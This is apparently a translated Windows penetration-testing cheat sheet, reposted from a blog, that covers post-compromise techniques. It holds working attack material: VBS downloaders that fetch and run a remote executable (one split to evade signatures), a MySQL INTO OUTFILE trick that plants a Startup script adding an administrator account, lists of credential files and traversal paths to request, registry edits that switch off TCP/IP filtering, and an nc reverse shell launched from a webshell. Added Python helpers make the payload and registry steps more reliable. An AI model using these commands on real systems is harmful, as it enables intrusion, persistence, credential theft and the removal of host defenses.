Windows Penetration Testing and Privilege Escalation Summary (2)

VBS downloaders:

1: build a downloader line by line with echo (all this needs is a command-execution primitive; the three xPost lines must come first, because sGet.Write reads xPost.responseBody, and http://xxxx/mm.exe is a placeholder for the real URL)

echo Set xPost = createObject("Microsoft.XMLHTTP") >>c:\windows\cftmon.vbs
echo xPost.Open "GET","http://xxxx/mm.exe",0 >>c:\windows\cftmon.vbs
echo xPost.Send() >>c:\windows\cftmon.vbs
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cscript c:\windows\cftmon.vbs

Mode 3 opens the stream read/write, Type 1 makes it binary, and the 2 passed to SaveToFile (adSaveCreateOverWrite) replaces an existing file of the same name.

2: a standalone downloader that takes the URL and the local path as arguments (the ProgID strings are split up to dodge naive signature matching on "Microsoft.XMLHTTP" and "ADODB.Stream"; note that LCase is applied to the URL as well, which breaks case-sensitive paths, and On Error Resume Next hides every failure)

On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

Usage:

cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
3: with MySQL, write a VBS into the all-users Startup folder using SELECT ... INTO OUTFILE; it runs with the rights of the next user who logs on interactively, so the account gets created once an administrator logs on. This needs the FILE privilege and, on 5.7.6 and later, a secure_file_priv that permits the target directory. Backslashes inside a MySQL string literal must be doubled (or written as forward slashes), and the folder below is the Chinese-locale XP/2003 Startup path:

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
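Whether this trick produces the script you actually wrote depends on two MySQL string rules the statements above rely on: backslash handling in the literal that names the output file, and the escaping INTO OUTFILE applies to the data itself. The following is an added example (not part of the original page and not MySQL's own code) that models both rules in Python, from the reference manual's description, using the page's three rows as input. It shows why the path literal must carry doubled backslashes, and that a payload row containing a Windows path would be written with doubled backslashes unless FIELDS ESCAPED BY '' is used.

```python
"""Model the two MySQL string rules that decide whether the
SELECT ... INTO OUTFILE trick above writes the .vbs you intended.

Added example, not code from the original page and not MySQL's own code.
It re-implements, from the MySQL reference manual, (1) backslash handling
inside a double-quoted string literal and (2) the escaping INTO OUTFILE
applies to data under its defaults (FIELDS TERMINATED BY tab, ENCLOSED BY
nothing, ESCAPED BY backslash, LINES TERMINATED BY newline). No server is
contacted; PAGE_ROWS are the three rows inserted on the page.
"""

# Escapes MySQL recognises in a literal. For any other character the
# backslash is simply dropped, so "C:\Documents" is stored as "C:Documents".
_LITERAL_ESCAPES = {
    "0": "\0", "'": "'", '"': '"', "b": "\b", "n": "\n", "r": "\r",
    "t": "\t", "Z": "\x1a", "\\": "\\", "%": "\\%", "_": "\\_",
}


def mysql_unescape_literal(body: str) -> str:
    """Value MySQL stores for the text between the quotes of a "..." literal
    (a doubled "" inside the literal is one quote character)."""
    out, i = [], 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body):
            out.append(_LITERAL_ESCAPES.get(body[i + 1], body[i + 1]))
            i += 2
        elif ch == '"' and body[i + 1:i + 2] == '"':
            out.append('"')
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def outfile_path_literal(windows_path: str) -> str:
    """Literal body for INTO OUTFILE whose stored value equals windows_path:
    every backslash doubled (forward slashes also work on Windows MySQL)."""
    return windows_path.replace("\\", "\\\\")


def render_into_outfile(rows, escaped_by: str = "\\") -> str:
    """Text INTO OUTFILE writes for rows of str/None columns. With the default
    escape character, the escape char, tab, newline and NUL in the data get a
    backslash prefix (NUL becomes backslash-0) and NULL is written as \\N;
    with FIELDS ESCAPED BY '' (escaped_by="") data is written verbatim and
    NULL as the word NULL."""
    special = {escaped_by: escaped_by, "\t": "\t", "\n": "\n", "\0": "0"} if escaped_by else {}
    lines = []
    for row in rows:
        fields = []
        for value in row:
            if value is None:
                fields.append(escaped_by + "N" if escaped_by else "NULL")
            else:
                fields.append("".join(escaped_by + special[c] if c in special else c for c in value))
        lines.append("\t".join(fields))
    return "".join(line + "\n" for line in lines)


PAGE_ROWS = [  # the three rows the page inserts into table a
    ('set wshshell=createobject ("wscript.shell")',),
    ('a=wshshell.run ("cmd.exe /c net user admin admin /add",0)',),
    ('b=wshshell.run ("cmd.exe /c net localgroup administrators admin /add",0)',),
]


def outfile_is_verbatim(rows) -> bool:
    """True when default escaping changes nothing, i.e. the file on disk is
    exactly the rows joined by newlines. False means add FIELDS ESCAPED BY ''
    (or use INTO DUMPFILE for a single row) or the script will be altered."""
    return render_into_outfile(rows) == render_into_outfile(rows, escaped_by="")


if __name__ == "__main__":
    startup = r"C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs"
    print("single backslashes  ->", mysql_unescape_literal(startup))
    print("doubled backslashes ->", mysql_unescape_literal(outfile_path_literal(startup)))
    print("page payload written verbatim:", outfile_is_verbatim(PAGE_ROWS))
    # A downloader line carrying a Windows path is NOT written verbatim:
    risky = [('sGet.SaveToFile "c:\\mm.exe",2',)]
    print("path-bearing payload written verbatim:", outfile_is_verbatim(risky))
    print(render_into_outfile(risky), end="")
```

Run it directly to see the two renderings of the Startup path and the escaped form of a path-bearing row; any row set that fails outfile_is_verbatim needs `FIELDS ESCAPED BY ''` on the INTO OUTFILE clause (or INTO DUMPFILE when there is a single row).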

Directory tricks in cmd:

List every directory under d:\freehost:

for /d %i in (d:\freehost\*) do @echo %i

Show only the folders in the current directory whose names are 1 to 3 characters long (trailing ? wildcards may match nothing):

for /d %i in (???) do @echo %i

Using the current directory as the search root, list every EXE file in it and in all of its subdirectories:

for /r %i in (*.exe) do @echo %i

Using a specified directory as the search root, list every file in it and in its subdirectories:

for /r "f:\freehost\hmadesign\web" %i in (*.*) do @echo %i

Print the contents of c:\1.txt: with /f the loop reads the file line by line and, with the default delimiters (space and tab), %i receives the first token of each line; blank lines and lines beginning with ; are skipped:

for /f %i in (c:\1.txt) do echo %i

delims= sets the separator (here a single space) and tokens= selects which field to keep, so this prints the second space-separated field of every line of a.txt:

for /f "tokens=2 delims= " %i in (a.txt) do echo %i

These forms are for an interactive prompt; inside a .bat or .cmd file the loop variable is written %%i.

Some common paths on Windows systems (swap C: for D: or E: as needed; hosting panels such as 星外 (FreeHost) and 华众 (hzhost), for example, are usually installed on D:). These are the files to request once you have an arbitrary-file-read (a download or include vulnerability): boot.ini and notepad.exe confirm the read works and tell WINDOWS from WINNT installs, the index/default files locate the web root, and several of the rest hold credentials (ServUDaemon.ini, FlashFXP.ini, Foxmail accounts.cfg, Default.rdp, MySQL user.frm). The SAM and SYSTEM hives are listed but are held open by the OS while it runs:

c:\windows\php.ini
c:\boot.ini
c:\1.txt
c:\a.txt
c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24\iislog4.exe
C:\WINDOWS\7i24\tool.exe
c:\hzhost\databases\url.asp
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
c:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
c:\www\default.asp
c:\wwwsite\default.asp
c:\WWWROOT\default.asp
c:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\navbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\ora\config\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
c:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
c:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmail\Foxmail.exe
C:\Program Files\Foxmail\accounts.cfg
C:\Program Files\tencent\Foxmail\Foxmail.exe
C:\Program Files\tencent\Foxmail\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe

Common relative paths to web application configuration files (the list is the cross product of the usual include directories, the usual config/connection file names, and one to three levels of ../ traversal):

/config.php
../../config.php
../config.php
../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/conn.php
./conn.php
../../conn.php
../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
../conn.asp
../../../conn.asp
/config/config.php
../../config/config.php
../config/config.php
../../../config/config.php
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/config/conn.php
./config/conn.php
../../config/conn.php
../config/conn.php
../../../config/conn.php
/config/conn.asp
./config/conn.asp
../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/data/config.php
../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
../../../data/conn.php
/data/conn.asp
./data/conn.asp
../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/index.php
./index.php
../../index.php
../index.php
../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
../../../index.asp

Removing TCP/IP filtering:

TCP/IP filtering lives in three places in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

CurrentControlSet is a link to whichever ControlSetNNN the machine booted from. The on/off switch is the EnableSecurityFilters DWORD under Tcpip\Parameters, and the per-adapter permit lists are TCPAllowedPorts, UDPAllowedPorts and RawIPAllowedProtocols under Tcpip\Parameters\Interfaces\{adapter GUID}; exporting the whole Tcpip key captures all of them.

Export each key with:

regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

Then, in all three files, change:

"EnableSecurityFilters"=dword:00000001

to:

"EnableSecurityFilters"=dword:00000000

and import the three files back silently (-s suppresses the confirmation dialog):

regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg

The change only takes effect after a reboot. Keep the unmodified exports: importing them again restores the filter exactly as it was.
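Editing three exported files by hand is error-prone, and the export also tells you what the filter was actually permitting, which is worth knowing before a reboot opens everything up. The following added example (not from the original page) parses a regedit export of the Tcpip key, reports EnableSecurityFilters and the per-adapter TCPAllowedPorts, UDPAllowedPorts and RawIPAllowedProtocols lists, and returns the same export with the switch set to 0. SAMPLE_REG is a constructed export with a made-up adapter GUID and port lists, not data from a real machine.

```python
"""Audit and rewrite a "regedit -e" export of the Tcpip service key.

Added example, not code from the original page. It parses the .reg text
regedit writes for HKLM\SYSTEM\...\Services\Tcpip, reports whether TCP/IP
filtering is switched on and what each adapter permits, and returns a copy
of the export with EnableSecurityFilters forced to 0, which is the manual
edit described above done programmatically. SAMPLE_REG is constructed for
the demo (the adapter GUID and port lists are made up), not a real export.
"""
import re

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip]
"Start"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000001
"Hostname"="web01"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{11111111-2222-3333-4444-555555555555}]
"TCPAllowedPorts"=hex(7):38,00,30,00,00,00,33,00,33,00,38,00,39,00,00,00,00,\
  00
"UDPAllowedPorts"=hex(7):00,00
"RawIPAllowedProtocols"=hex(7):30,00,00,00,00,00
"""

_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')
_HEX_RE = re.compile(r"^hex(?:\(([0-9a-fA-F]+)\))?:(.*)$", re.IGNORECASE)
_ENABLE_RE = re.compile(r'^("EnableSecurityFilters"=dword:)0*1[ \t]*$',
                        re.IGNORECASE | re.MULTILINE)


def load_export(path):
    """regedit 5.x writes exports as UTF-16LE with a BOM; "utf-16" honours it."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


def _logical_lines(text):
    """Join lines regedit wrapped with a trailing backslash (long hex data)."""
    out, pending = [], None
    for line in text.splitlines():
        if pending is not None:
            line = pending + line.lstrip()
            pending = None
        if line.endswith("\\"):
            pending = line[:-1]
        else:
            out.append(line)
    if pending is not None:
        out.append(pending)
    return out


def _parse_value(raw):
    """Decode one regedit value: "string", dword:, or hex(type): byte lists."""
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])       # \\ and \" are escaped
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    m = _HEX_RE.match(raw)
    if m:
        kind = int(m.group(1), 16) if m.group(1) else 3   # bare hex: is REG_BINARY
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        if kind == 7:   # REG_MULTI_SZ: UTF-16LE strings, each NUL-terminated, list NUL-terminated
            return [s for s in data.decode("utf-16-le").split("\0") if s]
        if kind in (1, 2):  # REG_SZ / REG_EXPAND_SZ written as hex
            return data.decode("utf-16-le").rstrip("\0")
        return data
    return raw


def parse_reg(text):
    """Map each [key] in the export to a dict of its values."""
    keys, current = {}, None
    for line in _logical_lines(text):
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if current is None or not m:
            continue                      # the header line, or a form not modelled here
        name = re.sub(r"\\(.)", r"\1", m.group(1)) if m.group(1) is not None else ""
        keys[current][name] = _parse_value(m.group(2))
    return keys


def describe_allowed(entries):
    """What an *AllowedPorts / RawIPAllowedProtocols list means: the single
    entry "0" is how the GUI's Permit All is stored, an empty list permits
    nothing, anything else is the explicit permit-only list."""
    if entries == ["0"]:
        return "all"
    if not entries:
        return "none"
    return ",".join(entries)


def filter_report(text):
    """Summarise TCP/IP filtering state from an export of the Tcpip key."""
    report = {"enabled": None, "interfaces": {}}
    for key, values in parse_reg(text).items():
        low = key.lower()
        if low.endswith("\\services\\tcpip\\parameters"):
            report["enabled"] = values.get("EnableSecurityFilters", 0) == 1
        elif "\\tcpip\\parameters\\interfaces\\" in low:
            report["interfaces"][key.rsplit("\\", 1)[1]] = {
                "tcp": values.get("TCPAllowedPorts", []),
                "udp": values.get("UDPAllowedPorts", []),
                "rawip": values.get("RawIPAllowedProtocols", []),
            }
    return report


def disable_filters(text):
    """The page's manual edit: flip EnableSecurityFilters from 1 to 0 in
    every control set the export covers; nothing else is touched."""
    return _ENABLE_RE.sub(lambda m: m.group(1) + "00000000", text)


if __name__ == "__main__":
    rep = filter_report(SAMPLE_REG)
    print("EnableSecurityFilters:", rep["enabled"])
    for guid, lists in rep["interfaces"].items():
        print(guid, "tcp=" + describe_allowed(lists["tcp"]),
              "udp=" + describe_allowed(lists["udp"]),
              "rawip=" + describe_allowed(lists["rawip"]))
    print(disable_filters(SAMPLE_REG))
```

For real files use load_export(r"D:\a.reg") and write the result of disable_filters back out with encoding="utf-16" before running regedit -s on it. On systems that have reg.exe the same flip is one command per control set, reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f, but either way the machine must be rebooted before the filter is gone.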

Webshell privilege-escalation tip:

Cmd path:

c:\windows\temp\cmd.exe

With nc in the same directory, a reverse cmd shell entered as a single command line, for example:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

usually fails.

But putting nc itself in the webshell's cmd-path field:

c:\windows\temp\nc.exe

and only the arguments in the command field:

-vv ip 999 -e c:\windows\temp\cmd.exe

does work. (That is a side note; ip and 999 are the listener's address and port, so start nc -lvp 999 there first, and -e needs an nc build that includes it.)

The same two-field method is usually what it takes to get pr.exe or Churrasco.exe to run as well.

Packing with RAR from the command line:

rar a -k -r -s -m3 c:\1.rar c:\folder

(a adds to an archive; -k locks the archive, -r recurses into subdirectories, -s makes a solid archive and -m3 is the normal compression level. rar.exe is normally at C:\Program Files\winrar\rar.exe, as in the path list above.)
 
Original article: https://www.cnblogs.com/milantgh/p/3601866.html